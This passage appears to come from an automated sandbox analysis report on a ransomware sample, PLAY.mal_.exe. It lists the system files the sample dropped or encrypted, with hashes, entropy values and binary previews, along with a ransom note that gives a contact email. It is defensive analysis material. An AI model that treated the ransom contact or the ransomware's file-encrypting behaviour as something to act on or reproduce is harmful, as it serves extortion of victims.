        Preview:.....^...`..Q.....`[..8....B..H._.1U..m....>..S.(...]...$....._Z.g....q.gP...>I.R...*..z.........T.....T..J...JM.h.W...Q.no....Dr}.<._....JK..y..;.N$..*p{R..T<...4.;7*.?<x...D..K.%.P.Ac{X...#._i..x.\..[.W6.......;...Y!<~.4.A..;.../..MTZ...)....k...S.`...!5..{..Z...........s.....t..L..Y7.K<E.t"4.1d..-.........gqk.et.....x.G7............+....[T.K../.b(...... ..8..~..y...~.@.i*..3..C....Z4..L?..y...85.........I5>E..m....l#......i..A..B6....S@.L7.K.. d..Tm.n......<......7.D.f.......V$..T..X.K....BY..;..........."Glm.dW6@19.w..AB.Y...k...... .}...P.b%.S...V.J..C..}...*"`.l...C'4{#4.........%..I.....2.........D.MR#7,nz.P.h.........9...Y.<J...C]Q..i..q..E....t8.."f..../.c.l......y..Bq....nk1:.}..-.....h..........F.).`..3..... u.".9=..!Q..<r...v.J.HkW...1....!..D.........@.}....1.e]N[w....p....S....1..pmB..../i.,.L...4TT8W.2.....[3G..-..8..b../..^+.6.O.y+F....d... ._....L.Fl.F....es...$hE.T.....h.^>q._...;3...9c.O.......h:n........~...ZVq9.:$..zP.

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.017.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.977752249432826
        Encrypted:false
        SSDEEP:
        MD5:CA8861F2BE2222BDAE1DBF79D0A0F344
        SHA1:283D94015CB25FDE80797BF6C8CF68B567755EDD
        SHA-256:C7FE06CD2F64D0D514D103EFAF766C50EACD0892D7020E7F4298BD9321E0CA7D
        SHA-512:1E61EB15B79B4A814F9EFBC753E76DA9812E216903B1554793FE654887A17CAB38212A059B0CC4615AD4A64045479C4130B0551F35697450E5B32234A4891C3D
        Malicious:false
        Preview:o..m....i..W<...G.v)......kC .h.C.203.~..>.y.G/.Pu1.zF..V._.......@..[.F...Q.q>-.x.$.@...... ]/+.S........$+..;`A...>|.-o$'..m.8..$&.I.*...e%...K8C.1..K.o9......=Q....H.....'.O.3...^..u/y@.Y..... .}D...c.....".h.V.ML.9;..[..\H`.h....}.0Y..q6K..G......VC.h..n..!.M..u...cI48...:..D...v..K~E......f..7.P.\E.4..?...nq.~}...........>.G.t..g!...c..]...I.3&...ec00...J#j.d..o.W......)-...ke'..x....K..O.+....}(....b...P...L....~x7.~..z.:$!...PV...#uSO..U..@.eM^-..P.p.O.....{|...;..^9...........J.M..0z..a.......U....r..u..6.nV.X|..^.sV.....j.n&..bq7....M..E1....@..:.v.5...v.`...\H..T.9...Ry~.....RZ.QC+(.G.(.Y..|..wE.(*...(S...0s.|R.v...=..vW..OP.K...`..g....~q.......EW.$..*........p.#].PM.&l`...1....=\..v.Kj..w.a...eE.x.K..O@....Y>++ u....(Y.q.....#*..\.#...U...3y.?Z..$..d..V)J......T..wx.HR..6T.A.f..(.._+.2.!C.x^:......`q2n.#.o...~,...9...+Y....i....._.,..O.~.....85..<..?#P.T......k.~....Y...J.G...aK.+..C.w.....R.,..|.m.H..k._.]I$...<F(o....c.5g3.q.on:R*@

        C:\ProgramData\USOShared\Logs\UpdateUx_Temp.1.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):37944
        Entropy (8bit):7.995359327354051
        Encrypted:true
        SSDEEP:
        MD5:F953CE3AB62CF9D9CE6C493F736AB10D
        SHA1:A6BDADE3343961968214C4337DAB884DEDA250FF
        SHA-256:64B907D37CDB5C9EEAC5ABA8DF0C532824471370DF960AD0AD6A01AD05DBB1D4
        SHA-512:DE8186F74D5751941C32E16B1EE7726BDA1DC5C4AD31B7B4D9D0CFC60EC2121223DC5979D7817544D84302FC3543AF7A00119A83D86C910C0CEF3783AB69E37C
        Malicious:true
        Preview:.Q....]i.b98.~.~...5.7..v.?0c.....8]W.:..{..\..:-).[.C.|o.......Uc....\......cm..c-.20.uK.X=.,.A......j+y .....~..j:}.Js..L..\c|.[,.A...|..Q......l^. ..4Avc.QJ....N..X..r.w.C..RE..$..j.(..Z..j...y..........}.U.~S..+.......]......[...9.D@..l.U..v..0...gKt.d.C..=w...9..xH@..^.b'..s(Z....Z.........{./.....1.....<`.......Np.$t......9[.]o.9..]t......%J../...=..v...X.P...^x|...DH..d"`.... .........\.[#...<T[.....#...L.......|...F8..{.oS}.P....g..........(TGsv|y.Zp...9..0...JM.c.8K.3...D.y..u.p@.../....>.....'".xzm....,.)Y...uU.7+.,.)d..C..A4.Ng.on6....<7!(...~ .Xk.t...n.*W0..I.......P....$&....~8.s.. C.E.h....G..1D..d.\>Z..gg...Dm...O].DJ..1..'.7p.$Dx..o.9..Bxa.^.'..T.....&.f.0Dj...t'.e.Z%'..m/......,zi}.*.R....5.)&..DD/....c....`..<S.s).fD..;.mN...a<.d..*YpE)!h.j..}75...4.K.K*.8=......g.$kD.V....k+.L..SO.,...7&D G..wd.>.`nq.<V.?.::....b...6s.@/...{..P...:=9.....a.i...T$/_....Q8..rG.n.1.9.b.....[....gA.6.k.....f..Y.6T?.+S...+...c9.

        C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2136
        Entropy (8bit):7.9060835757446455
        Encrypted:false
        SSDEEP:
        MD5:FA7F436743EBA19FE1FF34E6BDCAFE3E
        SHA1:8BC10D44C8863759F1BABD010D0E9D94FAD1A96B
        SHA-256:A1B8C0BB38FDDD20841E707060A4B30FB7A7433349D2F3BE503FB1F3310BAABC
        SHA-512:4272878257A4E3ABC250C2FCD98B74C85977817D5DC6C4CA28746E6B409644341559F86358C1846BE6DA0CBCA7BD191183501DAD8CDDEEB2E46E74861587663E
        Malicious:false
        Preview:.e.n..7..B..G.M.....NR....#...L....K.Ww._h..W.K0..x...7... .!.C............ ..=.....=.u.S..l...c).g.|G.#..##.Gm.;.....z.{.Yw.cmE`..3k.....B.........e....)&.R.9.hy.._.{.@......f.....z..2[ ........~.#..&ATJ.!.C....4.....+.M..UZ......L.......c#^P$a.M........Io?.W.o..`...m...quh.....^z.sTM...O..w....-.Y...]...>%.?../6.......?.}X.z...r.........sAH...8m.........O.:2._W.lW...*..sC...q..2.W-o"st....k.%.hh6].q...Z.s#.....*.....8..I.I.tR.....R..}.."...o..+..K.@mZ..C.h.!t..iJ.j..H.KVa.a..%.`9.Y. ..8..z..[..o.U.n0x..........]...y.F..!..B....2....v...7...g.` .y|7....y|^.%.ms:..o..p1.'..0.....#..p..0.p..vMz...+...e...]...F<.l.....B>|..Lu.o...,..kn...B...UR.t.......i...;{.._X...;......I.,...`...X..../q.......J.b.@.1;...W.$...[ .@.VSY..9'....Y.|...X,.......jh.a8....AFS..X..GD.cX.K....9...v/....=..\.n..!. .^(..[G7M(bN*z.......g..I.df..c......08y...q-p...Is..s@....@...J.,..6\*..F.#.....z.......?Y..@x.u.>.#....ZQ..IV..\...S.K.......l.O).0.K..

        C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2072
        Entropy (8bit):7.910974524461601
        Encrypted:false
        SSDEEP:
        MD5:ED52B3BE4574FF8B05CC68F897BD3E8F
        SHA1:15CE1BD3F39893B3A5D2D30DA8A599A91E9FE303
        SHA-256:7F862D3F1ECF9625FE7C10BC4CB3485368B5243370CE3537C42B3EF20FF00F3C
        SHA-512:BB95F266C5766C81F1113BF20001AFFEB9F829B08C305A26B379DA34DAC585B04796748E2B7DEC3DC746F12981ABD1FA98961391AAB195023DFE7BBC4C3B7417
        Malicious:false
        Preview:...!...l...B..O...g.::...Z.40...N.v.U>.....1c.'.....z..... ..+..w.....`...b"..0w4Kt......1.......+.4.OVF.3:...s.....~........y......Z.$.D.a.W.?_.......2j......~'..y ...@.z.V....l....w.J.....8...T..]...h..eUK..8.f#:.f+X.|..[....4.J.=.3.5.5.[.0.....REB.O....m...Z....6.....;..9.......y.K'"...JnR.6.....h@..x+..$..K......D....o....h...Eu.....-.M.}...`.4.a.59-...`s..Y.e!.....u..R..#Vh. gd....q....d.0....._%.ig.O.T_N...T.......$..?.e...U3.A.5...GL...._$8#=5U......n.(...G]......J..7...u.....Z..u..S...(....".J..>g.fxd..^.RQ...$b..F..p.k.....O.a.z..z.R..2.rmTm.....#}..~An...os.U5....7......&...l....-....Zh.....,.#5.Y.......!. ..Wz.D...._"G..s.....&._...<...s^0Z,e..p@.&]Cw2..E........Iw..g.S..K.Z..\...|e'0.r5.z5i.....(Kw.....$8:/ .`....).....q..@u&M.....q..c..l...|m.&.B...g+v...[:........L...7.....:h...zX.f.M.y...]..........H.Q.G..e.r].i...p"....d..u.."......F...r...2.t.a.....h.a-T=7.....5=]h..pw.Pqf.U.q2.....Dl.. .=0.?-.'...D.9.....)....*^.#.....,.w..K.

        C:\ReadMe.txt

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):31
        Entropy (8bit):4.309035020064295
        Encrypted:false
        SSDEEP:
        MD5:AF5C0A0FD6FA8BC8E59F6221A1705EE6
        SHA1:2DB1C8D26AECFDB8A827A67A5CBF16C4F9977F0D
        SHA-256:6E55ACC025EA4888FDF070A1707B6E04A509B24772E81D64595EA6B2848DD71F
        SHA-512:83FC1952BF5A1AA3FC4109B667655DFAD4FD7A72C45EF66D5119A281F24AFE939412577D8C3DC0D3BA0CE494BF32EBE11525749BA4181E4314973E6F3A36786D
        Malicious:false
        Preview:PLAY..teilightomemaucd@gmx.com.

        C:\Recovery\WindowsRE\ReAgent.xml

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2184
        Entropy (8bit):7.901481767430074
        Encrypted:false
        SSDEEP:
        MD5:9F4D6DDBCC64127D42A165E53513E34C
        SHA1:626A3F2349A8A42BFCC739E24E93EEDE3D7E83A3
        SHA-256:DC9724F746D805F7D836B92939634D2AE81F26D0176E0B3AD8319D8F9067D98D
        SHA-512:8FD5508BD3AF7992F298DEB563ADFDBA1F790A2324CF60F23257B3205C103C616512E10851AE3849B78980BE3E34A1F14FAF82CD9B230F0F9AC8A7A8AABBA391
        Malicious:false
        Preview:1L.?...KjJ...5...q...2..y.V!.../..o..`.=^....q.jq.0FS.g..ln5.x.!.8%..n'."..8.n...-......#>d....d.x..o..3..%.......y.....K.%.MD_....>.. .7..m.6$......g.Dz.;../.|...@..x.}b|....E..)K....a..8...K.0|.5...W/..CQ...9...(N.J..d...d_.i.-.._...>..3(..e.8.c...M).D..y..7}B.q.P.4M........9..*].3.........................f.ko....W..~d.}b.......+^Q...4.3(A.Nm....}.{4..{#.Y.u[....... .i?'F.x...~..Jm1[..j|./...8. .S.C...K...w.nP.p`Q.`....o........{...:c7mo.s.X.......V.\D.C.E.....u=?...I.... .fC..{. ......$..$.d@.i.P.Y.~l..G.'.....h....Gdk...WP..e......9E.c..-.m....'....=.C..e._.u5...3U.......Sf....N4....Yd_1.CJ.+...V.K.:e.=...".6.P..]....@..(..S@.._X....;.............*.b...'.j?.. ^.....v.r0{.![.e.C3.y.....y.m6.t..i....@C....q...^ .9..(..mqP.....ie.o....v}..1....C.->g.j.?P.....X,......'..P{...5c.g..@Y.4P..K..Q..W&.f.....ng."%W.w%....b..aG.2O3....|.<#..}..J.%.%....z.#/.{.Ig.5.%c.....+..Xz.W.C....\O.......*".vv.2.Y.....(..O+.H...go...9....X.....rH.ee..~.D.#N

        C:\Recovery\WindowsRE\Winre.wim

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):367240424
        Entropy (8bit):7.999786735873258
        Encrypted:true
        SSDEEP:
        MD5:737C3135B7CCB4D4854D1ED498CABC0C
        SHA1:CCDBB1074ED1715C017C5EF1B8ADA189A2E749E3
        SHA-256:08DBF5CD2B1DC3E651ACF1D8FAC56B47E0AB2887E46A99A1AB467AC5D240BF05
        SHA-512:250CD2F28C606FA0A9BF5AC6D15834144378B04EC0635901044B7E45C0698CBF9A5B0237750F002F760C95D4553F4A5627F7093E763BCDBBFC51D81C7542AD1C
        Malicious:true
        Preview:M.y .d......c1-.#.....B.i.j.....@.|..U9.Uw4M......pLR.)f1;.l.1.r:g.q....>a.3...R..R1,.Q..j.h{H...`..l.."..LN.6aPN.!\......$.w.p..o..v?h...C..i.......m.._.R'q.j..&..j.D.)..*.....U...@.`.@{.....ME..j:..{.v+.PQI.Z.2#..(..k..*.E.6a-.6...Q}.Sc...f...~Z.:J..."...@.'....wO.v,)..hz.....F....j..k....}\.K.qL!.j.CV=..A.....).....G...f....8.w.RM.0.p.....)..+........Z.q./.%..il....'..+.oK..A]..Sm..X.ZA/`....,/.`...M.M\Q.,.C=.)1...d..3.d...........4...d.xfd.q.w.eP...RJX.2....fY..%u.....D<.{..0..4....MC.P....S...|..b.y....!y...q:7.!.+.C..&..........d2.QV./e..|<*Q.]..b...c....6k.{T..`..o..*3...........<....Wy......P..*3..gI..X..K.p...IR.ak.......b...5."...H..!.a..)g.V.m.y..a %./S..M..I?...y:W..[......r....:..b.B.g.?..&.^.c.....X.44........v}M.h..<0...S.....!.OK5..zM1,.?.Wn.....1....1N...M..J..J.w.9.9.:w...ZW/..D:..D.....Z9kJ.m....@.yz!..*:.l....@....;"..Q.............K.....d..-@.z=.9oA.....K...JQ.o[F.....3.f..?.c.....j,.'../......b....\.....w....V.5!

        C:\Recovery\WindowsRE\boot.sdi

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3171384
        Entropy (8bit):7.999942819379644
        Encrypted:true
        SSDEEP:
        MD5:4520F44B0C1BAE13EC8018DA94C25C60
        SHA1:9FDE0E46B442DD8BCB32AD7061A61364B71A8613
        SHA-256:5FD32D4EE26BF0F9CC89771E464CD422DF36671DF350C415DA74855E815AFFFA
        SHA-512:9EDB8C36ADE8CFB2B2CBC852337594480F46A57E1FF7AF365CACF4701312D1200EE477F3F1F73E4EF8E42B46AC935AC1DDE0E14278549DE4E17FB7CE0F2E928E
        Malicious:true
        Preview:..s{.,j....n].b.~..l(C.rO......n.h.....!.o.~. .....e.`.w.=..E...j.....K.f...>...-...D..[m[.~.>h|..C..R.+nH.A|.hJ.-...}/....a.nn.b..ZxL....Vq8....a..].!/.....N...._..r.S3../so......m4....&yV.Y....!sZ......~W.2*.f........%FVm...KN....E..t...Q.FKm.....$R..z.......D..ja..{.3Sf.D....i..t.I..e.\.U..B..c..^M**S=*d@...o.Z......Q.d7.~Tc.i.......n.4M..z:J...........K.K.....&.*.*............ .v...KG...b...1....| ;b.:.X68..._V..Pq.Z^..e.h......|\..Nb.!.7G...@..S.......*W. ...@..xU......8c.....HR$.,..D.5Y.n..W`.>F|..jO.JeFK.p..m.&..z.....h...G.Zc...9...i..\........u.YT.f.d...u..EH;....k.Q....l$.mW&.R......)^.Q.....C.N.e...z...7I}...[...|....3..1V{/sOus.\......."...t...g....V.5.j..?.C$.....b..c'._.v~.^..@4.V......D....0.5.2,...n._.-~.... g.....HQD..l...2;...,..........?~.<..K`..4lD.....D.y.L...n.3....$gT.....Z.zN..K.fL..T.u..XX@.3.j...\...Sd8.2......%M.`...AG...}?.^!".`..y..U%.L.n...r..IOL.j....;..%.u..3.|...y..|#...8..^....sr..a......#zy.i.)...<6

        C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1080
        Entropy (8bit):7.801287173094148
        Encrypted:false
        SSDEEP:
        MD5:3D8F6AFD652FBF9E46DBE9FFBFF2A293
        SHA1:EC7522841A0EBE33BE7DA8E9E99532A7E8FF4E69
        SHA-256:B17342A7E1D0A6C1329A0236C3A84D23E7200539F2DACB17B5639B141BB28FD6
        SHA-512:1F4507FD352139A9412FA7171FEF4C03BC0C4949F4F1B9449CB7E8B21227AB824C4079BF04C774505983BB1F42399BBCA55B56181B5900B2112DA6B1213EFBDD
        Malicious:false
        Preview:.Y......lm..<Z....T..U.|.!.I>..........................?.2Vq...O.m..Y..+....i..G&=y...>..3g.....L....d.....^[moA2.E.S..2.`..c....Hd.s._.....A.h'.m.....=....F..UrD...`..'.n.....'S:.OO...1_.^....v..K_.M...i.....9.#...U.....W.=..f.:.p#.+......lo.'.N.$..DD.........\.Tl{....>p.Q...d......<j.&....x{ }$sY.N_E^..P.Nv...=..r..|.........Z[.i...D>../[a.TYg.bx0..2....Y.J...M...cpx!.....f.4.../S.[l.D...K.#..y_)5_.)WP..P......>y..R..t............).h&.K.'.N|GU.aO...u.....Aw!..<eNm\*..y...R...\K...v.P.7-.V~>.PTdq...._.&.....*.k^.W..(Z[..A......!....c.-.QEPp.?3.V..{...;R/...bH.3%.0..c(s..o...C.};.x.y.e......w..;.x6..`.7..`.}a.k......~..e~...JO....-.2'.W.w.q..]A.>.[.`5.(.o:K@.a.?.*#..j..T...eX...z.ww...1........Z..M...r..xu..h..-.t.<...WH..8...".e.0.:....\qQ.u.HC.bgY........j*..D....7.`.....'.V.x......j...>.ot.d....g....j(..c. ...U.Rz=uZi...e.t.q..y.._....$..._.<.T...G0..x"y...Y.....-#.."xX..B..D...c..=9..{....o..Z.....83J._...z.U.[AP.0...i.C.'Nl!ICBTY.l.Tbz]...w

        C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1624
        Entropy (8bit):7.8731881692252905
        Encrypted:false
        SSDEEP:
        MD5:799C368B699A1CEC6AEF281A6776D9A5
        SHA1:EF673A8A5216327C6673B1D5258647C8BFC14361
        SHA-256:7D30F228E7E3D71B374F6310825F77ECCF141A5B648F6B5C5A69F475F7EF7AA3
        SHA-512:7DE9676E2A4E53A8E6D8B7CABCEE22FB6A01BB25745C84AA97BF35EC52D2C56BC356FF8968BAB18B136C44D7F6D2378970933D111D9611831124326A4E95A499
        Malicious:false
        Preview:...._......D....+.N|.........LaE._......|........7.K.\mR.J...\..t.7....&.qw.Xz.."'&.0...`}...v.gZ(...a.p...2/C2!w.....Pf.)`.......=..x.m.....)&.i....$].'...e..-...d........D.....$...Fb|..-vX.....S...!z...( ....[....nt...O-..,.ZV...M.$d.K....T...\8..O.iC.i.Ur..B!.Cl.;.!t...X.....x~.....S........~.$..].....w../..o...\b).P...v..YlOU...b..k+.A.V..ta.ES..&#..n-.iwJ.7....+N.....-.d.$..X..;.s'm.iytP.._.fdW6.xz...xr3.B....Wf`C..#.Q[.h....k-.8..(M0...g.]....m.v..[........+*.CU.l....1..j.3K.....Qz%3.*?.......O\.*"......d.]i`..J%.......T..U.|.!.I>...............................T.QS.T..6..j-.c.Y.zC."....fH..sp..(......c.@....u..org..z...;.....X.p.n....E...N#...._..e..6C.bF.-IK....H=.*$.\..o#.......l}.6..u. q..r.......2!.{'..~HF....&.;C.....f.....z........c..Z.Gv.dq.......5.. _k..=D.K"....6lv.p.OC.2.r.{:xv.3mS.$.W.....:.]@.B.b.q..+oNmf*.....:i .JyOE............)..h.........'..aw{....$.AR...\..%....V......r.[/...5-.S..of.7A.:.}...&."^.....*...wh...R

        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1640
        Entropy (8bit):7.883343658576476
        Encrypted:false
        SSDEEP:
        MD5:AF503E20DDE71B205CF360310387F94F
        SHA1:07A346F430C3BBDFCC21DE841FFECD83F1C7A5FF
        SHA-256:C79093C85161E27C3A4E33D21A88DC2748F48C22F09D16D2CA86ECAAC94FC2E5
        SHA-512:B2B33C453F1D36728992BB4BA730D99559F569A45BB1A1B7B23A39F82052194D69702DBBB71754C087635635812C10F74B4C1EB7123EB41E0B6C611BFC4E2EFF
        Malicious:false
        Preview:.yl...|.>....Ri...^......f..=..f.b...4........mAg:].U..........`|.o+..@..p>D.ho.......N.s.\..+.y...2kT5......C...@ ...........t.0..bQ.a}..L.......je.s..:L...bk.A~S.F0f..~{.....l.JU.,4.T.......}....r...1......./.a....t...T...C...*.../B]&=4.u...r/S.~UoR/...5._,FY|..../..G.;.w~...n..b......6Yk.W(..n../.E..v.A.V.r..g.]#2.R..FSCL..~#p'..*..y......X.ND....<Y...e... :.X..=.y..k@.. .....j...[...4......5.$-.r..4.... >0..G...)a..Fa.o...C....(..y.6.at.j........F.S......>..]..1...7j....)+D.i...{.ku.....!6g...=j6.dd.@B....=.<.3(..).....o.z1z..;.l,.t..;J.....T..U.|.!.I>..........................5.|.#W.T...i...M...P.d.>l|I;m..4....?.d].6...`.A...(.\.=...J....b........n...m......."...>.}.t......8....O.3RQ.C!...]X.6)M.~f.A...U.....!......q......q.jf..g......./-...z.x.>.F...2...h]V!..4K.Y..R\.....t..H....+.lo...|....e0..#.).:...*0R....yR..Z..,...9O..n.........p,.W.:d'.l=.._...5L.S..b...U.d:|..........VF*p..J....F..+.o.=...f.....:..l....k."...[..jo.;.a.dI.r..K

        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1400
        Entropy (8bit):7.837949492752699
        Encrypted:false
        SSDEEP:
        MD5:75CB8A08F789A1A47C350D42326AFCF9
        SHA1:363289327CB2C0AAEEBA2E68477793BA77AD7553
        SHA-256:7B9A6197278016549606E9BD19DE50DA32D9890548D4F99EF3881945CB36349D
        SHA-512:E1ED614A22AA78F9FF8D951F69DD46E9276ECB31DD3D18D413C326767DCA5ECB367F91A179ED8E12C32BA59F2FDACC0853E4F1E7378CC8501C1C28DF3B605A50
        Malicious:false
        Preview:...Z..E.....V.R:.]..a...U....h~.,o6.z...!..+...y._.....z...R..7E..}b_.D..RAl-b..7]B.lC.WPC.Br...t..f.ks.bX....hs.m..J.."va..y.nv..3j.|.;...B.....j.Y...jDByF..{O_.l4%e...\@Os...;..G..xU.!........q.KK.SU ".+..V9k.{...F#.....ep.......w.!.C.).b..xv..=]....~W.y...G..6.7+sC........T0.S..'.r.....d..V.j^..+...Km$[....@<...%.}.K...T..U.|.!.I>............................H.u..c....ev76...Q.z...9D+...0....$mP.,Au.. .)&.j...-..^.W..{%s^e.P..Z..ed...H...28...{...t./o....jd..=..-.X.[G....l..B.cU.I..hh.6.i.......qB.I:...K~..W.`........$..._..]..~ .n..Sy.."K..|B....Y..c."....O.U.<&.1..~..-.(.].z]..\.D.X..1...;m.2."... ......p.|..!6+..O^_.....k[..".q...i........h.x.e....YoM...I.O{.NCy7.~zz.*z.H..x..]I...F..r.'..r)..ca....f.<.P#....N.\....(zc:.....,:.v&...+.....N..<w.......CS./.ZZC..B...D.d....Fr..n\&r..<.:.ty...K..#.U.....w.q"D....6$Y.'x...).......x.d..gT7..`..E9z.c..t"..-..h..1;$........OLpe.?.U..}.....|...0....Wq..y[...S.5.(...V.....A.8..JNb@2J8,(.=.G....

        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.800395307582602
        Encrypted:false
        SSDEEP:
        MD5:34F1020AF085FA2F8A28BFF2E751D559
        SHA1:BFE48A37B15DDD172B01C58F09658A873988686F
        SHA-256:382462A5BBFEB4B19637F62A84CDAF079AF5186E29344A97F3AE9CC6465DD903
        SHA-512:75D0F1A131ED834B17C0272D7D0FF1A866FC68EFF5F8C08AE0D21BCE23A4F6274D4AECF4F42E5F0EC88BCB624C3C331D008ABFFBD58E8671CF817F0FAD8761AD
        Malicious:false
        Preview:N}.`R.e.[........b....a......S...Z> ay......O....I.......#w.....(q.f....._.A..}..Q..W.&.@.UjK.).M.3....{.X.....:.t...XSuM..q2...TH..c.?.I.k.Q..m..Q..._.V`...T[G.!..W{(....T..U.|.!.I>..........................p4....J.ig..9#..V.........$...[u92d.n .+....h.l.~.W..Ge.....rx.....'.r.HG.\1w....7....I5.}...h.=.....lQd[k....w$"..Z......-.i.v.qc}..^...hA..P.#.}..R..-9[.....h0.=....E.|.S.b-d.-.......kb....2..{]@xE.H......W...L.....U3/...\...K...Y..Q.m.........Y..5A.[9..tD...iB]G..m.8]....<.~.0x......&JL>..>%%............d..Q..;9.I....|o.zL...=O.)|@M.2..M[<....e ...n....=.'.]...^.5.&.........qP-.....,....(..UN...|......./..N.u.&T.. .>.rrb..{w.k..,&.:...J;....&;>......D..N........82.N.%.&`...P...^U....GY._.]R...9$Xtq..........s.w..{R..eR! p=:..n.>\...>....<.bek.../.Jl...._a...D..zb._.%..d...:.S>v..s.O...m.i....)...S.|x...H.vo.[..Jg.^D..Kc.....6(..mT...pJ.G..Y.]..{..@^..1C.(.}.O&._;.h...+......`.....w.\..-%.&...Z.9.U.9..O...g.4.H......L.K%K.U1.V.

        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1864
        Entropy (8bit):7.9010726387475705
        Encrypted:false
        SSDEEP:
        MD5:6B5BF7697550917A6F1D120EF92C4EA1
        SHA1:970770344EF6018D7CAA838F02EAB10256FB9A87
        SHA-256:D75BD6EB8D4F6800D6B97494FEF74B2492ADBC7FDE4F2BD425D812C7EAEE7690
        SHA-512:F0B4FD394A5FED4791F549495021D258B81146D59D8FDD6BB185F8B9D413C7418D3BF11EF5E22DE946134E3B1C8F3E2A5C7EAE64B179A60207E30F7F60DC2C2C
        Malicious:false
        Preview:..z6.cm.y....'....*..S...\...4.T... .D.4......R.....H.......... .K..K..l.6u[.V(...*...P .i1...A....{..x/.....;!^..Ag...ss...5._.5.x.."....Aw...)6.&h._J.?.....7.K...w.V.o..._j....k.q'@.m#.7.T{:.X..!b.'/..14fg...F...P.K.d..:w.4f.h.`Sl.....F.-]...\.d/n.>A,4_...`;I.,t...k.~..N....hB..3.1.............#.kW..vK..r../)..3...4[..J...4....k:.iq{.P...v*.q%..r.H........kF.p.t....p..ll.m.....Wd..'d...{.Avj...Vu.......)...../E88....|$8.\.V.|..v..T...A..............Oc~d.Q.....v.......r}'Pj..../e..Q.J.5Q.4..%`.....I.Q......]<,.[.A........-v..y-i{Z..+J%|..@M&.......y.t......t...............W.g.....O0+...3...hl..bU8e.qxcc-...pK.......p+.<a>skL......vp.7..._(.......)5.1..KC.!7...E.H+..h/y.^..].k@.....v...I.K.9...K....SCg.j.%G..K...q.b....OU.$..n.....f.....VHJa....\....T..U.|.!.I>..........................#.p....9..>H<.o..Q.i.7..d.u..}ph..t[...zJX)....E.k..s.7....cj.._..n.Y. V.M.8h..V"......l.....2fh..M..p`.yQ..L?Y......<o.Z.).q._...A.]=.VO....iA....P.{...

        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.8350501558547165
        Encrypted:false
        SSDEEP:
        MD5:C097A848ABFE3E39FE784B6E032B1788
        SHA1:FE8EB05FBB6073629D5A9A6285646106783D313F
        SHA-256:BB6022E1F40FD68D3D70B680ECA8D16BB08F790E4036631984A048212C62DC6D
        SHA-512:AC67BC78777DDE939832AE9CAC87522D488395D0E0F54A4600BEC71915AE1029D925B8676227E44BF759059061C5F4302A709D2F6DA3A5CDB2A4DCEA8A4B8002
        Malicious:false
        Preview:..1...w....Dl..=....(..ir%.'...k.VP.....9..h..(.P..E.<..NvJ......!yt2..'o.1}.l\....k......|0..m.,.l......M]..........l2...%...%Kk.S..h.^....5.r.._..........n.a\..j..LG1...Y...elC....@..F.=Bns...a.f.....Sm....{...T..U.|.!.I>..........................&..a.+.U.....K..L.....T.*..."./EF....:u$y-O.t...a`..`|....kV5.....Fhc...........w.O..&.|..b..Bw.A.t.cK...T..n..Su.!P.I'..i.._.......>..zc,..x.....v}.u..C....ZOU.b.{....T(|i...h.n.R7.vF.A5..8O.$../.;....Y...qN.../.x..#u....2.5......L..<B.K...E.....k......J......"....!,m.o.t.7.....o....LGH.b..sS....<E"....W..<.....U..ps.......r... .#.z...R4.v...$.@k=P...D.Ano|.c...WNv.n..UHX.....:..)......8....+..T..V[..E.+/n..8,...:..$.........>.....!.m.7..././.bZ..,....#A..]..6M.u-?K..2d.W.1..C.=.K;p.....N.S...y_}M..I$xK&r.....O.S{$'......C..{F..G._.X.!3.l~8J..Zt...P......=C..x.".P{.H_ZU.k6V...'......wb6T.m..g.3..,.....=.gA....b..T-;.X.....vZ.....`0&.C...7I5..O.......f...[...g..<Y.2_$X..../K$..\....B...".a.N

        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1112
        Entropy (8bit):7.7837199765091105
        Encrypted:false
        SSDEEP:
        MD5:AC0C9B1632AB77407DBB31534EF27AC6
